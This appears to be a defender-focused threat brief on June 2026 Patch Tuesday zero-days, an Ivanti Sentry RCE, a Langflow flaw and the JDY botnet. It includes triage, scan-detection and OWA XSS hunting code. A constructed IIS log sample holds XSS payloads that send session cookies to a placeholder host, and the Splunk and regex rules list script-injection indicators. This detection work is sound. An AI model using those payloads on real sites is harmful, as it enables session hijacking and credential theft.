Three exploited zero-days in a single Patch Tuesday. A CVSS 10.0 Ivanti gateway getting popped in the wild. An AI development platform handing out unauthenticated root shells. June 11 is not a slow day. Every story below has active exploitation confirmed — the common thread is that attackers are faster than patching cycles, and the gap is widening.
In the News
Microsoft Patches Record 206 Flaws — 3 Zero-Days Already Exploited
June 2026 Patch Tuesday sets a new record: 206 vulnerabilities in a single release, surpassing the previous high by a significant margin. Of those, 39 carry critical RCE ratings, and three were already being exploited in the wild before patches shipped.
The most operationally urgent of the three is CVE-2026-42897, a cross-site scripting vulnerability in Exchange Server’s Outlook Web Access interface. Evidence of exploitation dates to at least May 14 — meaning attackers had nearly a month of access to vulnerable OWA deployments before Microsoft delivered a fix. XSS in OWA is not theoretical: it enables session hijacking, credential theft via injected forms, and lateral phishing from trusted internal mail interfaces.
The sheer volume of 206 CVEs creates a triage problem that no manual process can handle efficiently. Organizations running vulnerability prioritization tooling that ingests KEV and exploit-maturity signals will surface the three exploited zero-days automatically. Everyone else is sorting a spreadsheet while attackers are already inside.
For Exchange administrators specifically: if OWA is Internet-facing and unpatched since May, assume compromise and investigate for indicators of session hijacking before applying the update. Patching alone does not remediate existing compromise.
What defenders should do: Prioritize the three exploited zero-days for immediate patching (within 72 hours, per CISA’s revised BOD timelines). For CVE-2026-42897, audit Exchange OWA logs back to May 14 for anomalous session creation or cross-origin script injection indicators.
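The "spreadsheet versus tooling" gap above comes down to a ranking function that joins the vendor release with exploitation signals. The following is an added example, not the brief's own tooling and not any vendor's API: it reads a constructed slice of a release (placeholder CVE ids and scores, not the June 2026 data), joins it against a constructed stand-in for the CISA KEV catalogue, puts anything exploited in the wild in tier 0 with the 72-hour deadline the brief cites, and orders the rest by critical RCE first. The release timestamp and tier layout are assumptions.

```python
import csv
from datetime import datetime, timedelta
from io import StringIO

# Constructed slice of a Patch Tuesday release. CVE ids and scores are
# placeholders, not the June 2026 release data.
PATCH_CSV = """cve,cvss,impact,vendor_exploited
CVE-EX-0001,9.8,RCE,yes
CVE-EX-0002,9.8,RCE,no
CVE-EX-0003,7.8,EoP,no
CVE-EX-0004,6.1,XSS,yes
CVE-EX-0005,5.4,Spoofing,no
"""

# Constructed stand-in for the KEV catalogue feed (a set of CVE ids).
KEV_IDS = {"CVE-EX-0003"}

EXPLOITED_SLA = timedelta(hours=72)  # the 72-hour window cited in the brief


def parse_release(csv_text):
    """Parse the vendor release CSV into typed records."""
    rows = []
    for row in csv.DictReader(StringIO(csv_text)):
        rows.append({
            "cve": row["cve"].strip(),
            "cvss": float(row["cvss"]),
            "impact": row["impact"].strip(),
            "vendor_exploited": row["vendor_exploited"].strip().lower() == "yes",
        })
    return rows


def tier_for(entry, kev_ids):
    """0 = exploited in the wild (KEV or vendor flag), 1 = critical RCE, 2 = everything else."""
    if entry["vendor_exploited"] or entry["cve"] in kev_ids:
        return 0
    if entry["impact"] == "RCE" and entry["cvss"] >= 9.0:
        return 1
    return 2


def triage(csv_text, kev_ids, release_iso):
    """Rank a release by tier, then CVSS. release_iso is the patch release time (ISO 8601)."""
    release_time = datetime.fromisoformat(release_iso)
    ranked = []
    for entry in parse_release(csv_text):
        tier = tier_for(entry, kev_ids)
        # Only the exploited tier gets a hard deadline: the brief states a 72-hour
        # window for exploited zero-days and no SLA for the rest, so the others are
        # ordered but left undated.
        due = (release_time + EXPLOITED_SLA).isoformat() if tier == 0 else None
        ranked.append({**entry, "tier": tier, "in_kev": entry["cve"] in kev_ids, "due": due})
    ranked.sort(key=lambda e: (e["tier"], -e["cvss"], e["cve"]))
    return ranked


if __name__ == "__main__":
    # Assumed release timestamp for the demo run.
    for e in triage(PATCH_CSV, KEV_IDS, "2026-06-09T17:00:00"):
        print(f'tier {e["tier"]}  {e["cve"]:<12} CVSS {e["cvss"]:<4} {e["impact"]:<9} '
              f'KEV={str(e["in_kev"]):<5} due {e["due"] or "next window"}')
```

Swap `PATCH_CSV` for the vendor's release export and `KEV_IDS` for the ids pulled from the KEV JSON feed; the point is that the exploited tier surfaces regardless of CVSS, which is exactly what a CVSS-sorted spreadsheet misses.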
Ivanti Sentry CVSS 10.0 RCE — Root on Mobile Gateways
A maximum-severity remote code execution vulnerability in Ivanti Sentry is under active exploitation. The flaw allows unauthenticated attackers to achieve root-level code execution on the secure mobile access gateway — no credentials, no user interaction, just network access to an exposed appliance.
This is Ivanti’s third major zero-day cycle in 2026 alone, following the Connect Secure campaign in January and the Policy Secure disclosures in March. The pattern is clear: Ivanti appliances are a persistent target, and every Internet-exposed instance is an assumption waiting to fail. A CVSS 10.0 with confirmed exploitation and no authentication requirement places this at the top of any rational triage list.
Organizations running Ivanti Sentry for mobile device management or secure remote access need to patch today or isolate the appliance from Internet access until patching is possible. Network segmentation is the compensating control — these gateways should never sit in flat network segments with access to domain controllers or identity infrastructure.
What defenders should do: Patch Ivanti Sentry immediately. If patching is delayed, remove Internet exposure and restrict access to management interfaces. Conduct a retrospective hunt for indicators of compromise on any Sentry appliance that was exposed before the patch.
Langflow AI Platform CVE-2026-5027 — Unauthenticated RCE in the Wild
CVE-2026-5027 is a path-traversal vulnerability in Langflow, an open-source platform for building AI agent workflows and LLM pipelines. The flaw requires no authentication — any Internet-exposed Langflow instance is exploitable. Although it was disclosed in March 2026, many deployments remain unpatched, and attackers have now weaponized it.
This matters beyond the single CVE because it represents a category of risk that most organizations have not yet addressed: AI development tooling deployed by data science teams, often outside the purview of security operations, with Internet exposure that nobody audited. Langflow instances frequently have access to internal APIs, vector databases, and credential stores used by AI pipelines — making them high-value initial access points.
The path-traversal-to-RCE chain is straightforward, and exploitation at scale is trivial once scanning identifies exposed instances. Organizations building AI workflows should inventory all development platforms with network exposure and apply microsegmentation to ensure dev tooling cannot reach production data stores directly.
What defenders should do: Identify and patch all Langflow instances. If any were Internet-exposed before patching, investigate for compromise. Apply network microsegmentation to all AI development infrastructure as a baseline control.
JDY Botnet Expands to 1,500+ Devices — Scanning U.S. Military Networks
The China-linked JDY botnet — associated with Volt Typhoon operational infrastructure — has grown to over 1,500 compromised SOHO routers and IoT devices. The botnet conducts continuous port scanning and service fingerprinting against U.S. military and critical infrastructure networks.
The operational significance is the mission: reconnaissance, not payload delivery. JDY is building target packages — mapping exposed services, identifying vulnerable software versions, cataloging network topology — for future operations. This is pre-positioning, consistent with Volt Typhoon’s documented living-off-the-land approach to critical infrastructure targeting.
For organizations with SOHO devices at branch locations, unmanaged IoT, or any edge infrastructure outside centralized monitoring, the risk is dual: your devices may be botnet nodes conducting scanning on behalf of a state actor, and your networks may be targets of that scanning.
What defenders should do: Audit SOHO router firmware across all sites. Enable DNS-layer monitoring for C2 callback detection. Deploy network detection on OT/IoT segments to identify anomalous scanning behavior originating from or targeting your infrastructure.
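The "anomalous scanning behavior originating from or targeting your infrastructure" item maps to a simple flow-level detector. The following is an added example, not anything from the brief or from a vendor product: it runs over constructed flow records (NetFlow/Zeek-style tuples, not real telemetry) in tumbling time windows and flags a horizontal sweep (one source, one port, many targets) and a vertical probe (one source, one target, many ports). Window size and thresholds are assumed tuning values.

```python
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Flow = namedtuple("Flow", "ts src dst dport")

WINDOW_SECONDS = 120     # tumbling window size (assumed tuning value)
HOST_THRESHOLD = 16      # distinct targets on one port from one source -> horizontal sweep
PORT_THRESHOLD = 8       # distinct ports on one target from one source -> vertical probe


def constructed_flows():
    """Constructed flow records standing in for NetFlow/Zeek conn output; not real telemetry."""
    base = datetime(2026, 6, 11, 3, 0, 0)
    flows = []
    # One external source touching port 443 on forty internal hosts in about 80 s.
    for i in range(1, 41):
        flows.append(Flow(base + timedelta(seconds=2 * i), "198.51.100.77", f"10.10.0.{i}", 443))
    # The same source then walks common service ports on a single host.
    for j, port in enumerate([21, 22, 23, 25, 80, 110, 135, 139, 445, 3389, 8080, 8443]):
        flows.append(Flow(base + timedelta(seconds=100 + j), "198.51.100.77", "10.10.0.5", port))
    # Benign background: a resolver client and a couple of HTTPS sessions.
    for k in range(30):
        flows.append(Flow(base + timedelta(seconds=3 * k), "10.10.0.20", "10.10.0.2", 53))
    flows.append(Flow(base + timedelta(seconds=5), "10.10.0.21", "10.10.0.3", 443))
    flows.append(Flow(base + timedelta(seconds=9), "10.10.0.21", "10.10.0.4", 443))
    return sorted(flows, key=lambda f: f.ts)


SAMPLE_FLOWS = constructed_flows()


def detect_scans(flows, window=WINDOW_SECONDS,
                 host_threshold=HOST_THRESHOLD, port_threshold=PORT_THRESHOLD):
    """Return alerts for horizontal and vertical scans seen within tumbling windows."""
    if not flows:
        return []
    t0 = min(f.ts for f in flows)
    hosts_by_src_port = defaultdict(set)   # (window, src, dport) -> {dst}
    ports_by_src_dst = defaultdict(set)    # (window, src, dst)   -> {dport}
    for f in flows:
        # Window index relative to the first flow, so boundaries do not depend on timezone.
        w = int((f.ts - t0).total_seconds() // window)
        hosts_by_src_port[(w, f.src, f.dport)].add(f.dst)
        ports_by_src_dst[(w, f.src, f.dst)].add(f.dport)

    alerts = []
    for (w, src, dport), dsts in hosts_by_src_port.items():
        if len(dsts) >= host_threshold:
            alerts.append({"kind": "horizontal", "src": src, "dport": dport,
                           "count": len(dsts), "window": w})
    for (w, src, dst), ports in ports_by_src_dst.items():
        if len(ports) >= port_threshold:
            alerts.append({"kind": "vertical", "src": src, "dst": dst,
                           "count": len(ports), "window": w})
    return sorted(alerts, key=lambda a: (a["window"], a["src"], a["kind"]))


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_FLOWS):
        print(alert)
```

The detector is direction-agnostic on purpose: an external source sweeping your range and a compromised SOHO router on your own address space scanning outward both show up, and the `src` field tells you which of the two situations the brief describes you are in.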
Defender Action Items
- Patch the three Microsoft zero-days within 72 hours — prioritize CVE-2026-42897 (Exchange OWA XSS) and audit OWA logs back to May 14 for session hijacking indicators
- Patch or isolate Ivanti Sentry immediately — CVSS 10.0, unauthenticated root RCE, confirmed exploitation; remove Internet exposure if patching is delayed
- Inventory and patch all Langflow instances — CVE-2026-5027 requires no authentication; microsegment AI dev tooling from production data stores
- Audit SOHO/IoT firmware at all branch sites — JDY botnet targets unmanaged edge devices for reconnaissance; enable DNS-layer monitoring for C2 detection
- Schedule FortiSandbox patching — CVE-2026-25089 (CVSS 9.1 command injection) is not yet exploited but warrants next-window attention
Detection Spotlight
Exchange OWA XSS exploitation (CVE-2026-42897) will leave traces in IIS logs where injected scripts execute in the context of authenticated OWA sessions. The following Splunk SPL query hunts for anomalous script references in OWA URL paths — a high-fidelity indicator of reflected or stored XSS exploitation attempts against Exchange.
index=iis sourcetype="iis:access"
cs_uri_stem="/owa/*"
(cs_uri_query="*<script*" OR cs_uri_query="*%3Cscript*" OR cs_uri_query="*javascript:*" OR cs_uri_query="*javascript%3A*" OR cs_uri_query="*onerror=*" OR cs_uri_query="*onerror%3D*" OR cs_uri_query="*onload=*" OR cs_uri_query="*onload%3D*")
| stats count by src_ip, cs_uri_stem, cs_uri_query, cs_username
| where count > 1
| sort -count
This query catches reflected XSS payloads in URL parameters and attempts to inject event handlers through OWA query strings. Note that IIS records cs-uri-query as the client sent it, so payloads usually arrive percent-encoded (%3Cscript, onerror%3D); match the encoded forms as well as the literal ones, or decode the field before matching. The false positive rate is low on OWA-specific paths — legitimate OWA traffic does not carry script tags or JavaScript event handlers in URL parameters. Correlate hits with authentication logs to determine whether the source IP obtained a valid session.
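The same hunt, as an added Python example rather than the brief's own query, run directly over raw IIS W3C log lines for sites without Splunk. It parses the #Fields header, decodes cs-uri-query (bounded repeated decoding, so single- and double-encoded payloads both normalize), matches the same indicators as the SPL above on /owa paths, and aggregates by client IP and username. The log lines are constructed samples, not real telemetry, and the field list and thresholds are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not real telemetry). 203.0.113.7 is the
# noisy client; the other addresses are ordinary OWA users.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2026-05-14 09:12:01 10.0.0.5 GET /owa/ - 443 - 198.51.100.20 200
2026-05-14 09:12:03 10.0.0.5 GET /owa/ ae=Item&t=IPM.Note&id=AAMk 443 CORP\\alice 198.51.100.20 200
2026-05-14 09:13:10 10.0.0.5 GET /owa/ ae=Item&id=%3Cscript%3Edocument.location%3D%27https%3A//203.0.113.9/%3F%27%2Bdocument.cookie%3C/script%3E 443 - 203.0.113.7 200
2026-05-14 09:13:11 10.0.0.5 GET /owa/ ae=Item&id=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27https://203.0.113.9%27)%3E 443 - 203.0.113.7 200
2026-05-14 09:15:40 10.0.0.5 GET /owa/ ae=Item&id=javascript%3Avoid(0) 443 - 203.0.113.7 302
2026-05-14 09:20:00 10.0.0.5 GET /ecp/ x=1 443 - 203.0.113.7 200
2026-05-14 09:21:00 10.0.0.5 GET /owa/ ae=Dialog&t=AddressBook 443 CORP\\bob 192.0.2.44 200
"""

# Same indicator set as the SPL query, applied after decoding.
XSS_PATTERNS = [
    re.compile(r"<script", re.I),
    re.compile(r"javascript:", re.I),
    re.compile(r"\bon(?:error|load|mouseover|focus)\s*=", re.I),
]


def parse_iis_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def normalize_query(query):
    """URL-decode repeatedly (bounded) so single- and double-encoded payloads match."""
    if query == "-":
        return ""
    current = query
    for _ in range(3):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def find_owa_xss_hits(text, min_count=2):
    """Return {(c-ip, cs-username): hits} for OWA requests carrying XSS indicators.

    min_count=2 mirrors the SPL query's `where count > 1`.
    """
    hits = Counter()
    for rec in parse_iis_w3c(text):
        if not rec.get("cs-uri-stem", "").lower().startswith("/owa"):
            continue
        query = normalize_query(rec.get("cs-uri-query", "-"))
        if any(p.search(query) for p in XSS_PATTERNS):
            hits[(rec.get("c-ip", "-"), rec.get("cs-username", "-"))] += 1
    return {key: n for key, n in hits.items() if n >= min_count}


if __name__ == "__main__":
    for (client, user), n in sorted(find_owa_xss_hits(SAMPLE_LOG).items(), key=lambda kv: -kv[1]):
        print(f"{client:<16} user={user:<10} indicator hits={n}")
```

A client that shows up here with cs-username "-" on every hit never held a session; one that flips to a real username after the injection attempts is the case the brief tells you to correlate against authentication logs.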
Related Briefs
- Microsoft’s Record 206-Flaw Patch Tuesday — 4 Zero-Days
- Check Point VPN Zero-Day CVE-2026-50751 — Qilin Exploits
- SolarWinds Serv-U Zero-Day Exploited — Patch Now
- Cisco SD-WAN Zero-Day CVE-2026-20245 — Exploited, No Patch
- Cisco Unified CM PoC Exploit — Critical Root Access Flaw
References
- Microsoft patches record 206 flaws — The Hacker News
- Ivanti Sentry max-severity RCE exploited — BleepingComputer
- Langflow vulnerability exploited for RCE — SecurityWeek
- Microsoft patches exploited Exchange Server vulnerability — SecurityWeek
- JDY botnet expands to 1,500+ devices — The Hacker News
- CISA rewrites BOD patching timelines — The Record
- Ivanti, Fortinet, and SAP release patches — The Hacker News
- ShinyHunters Oracle PeopleSoft campaign — BleepingComputer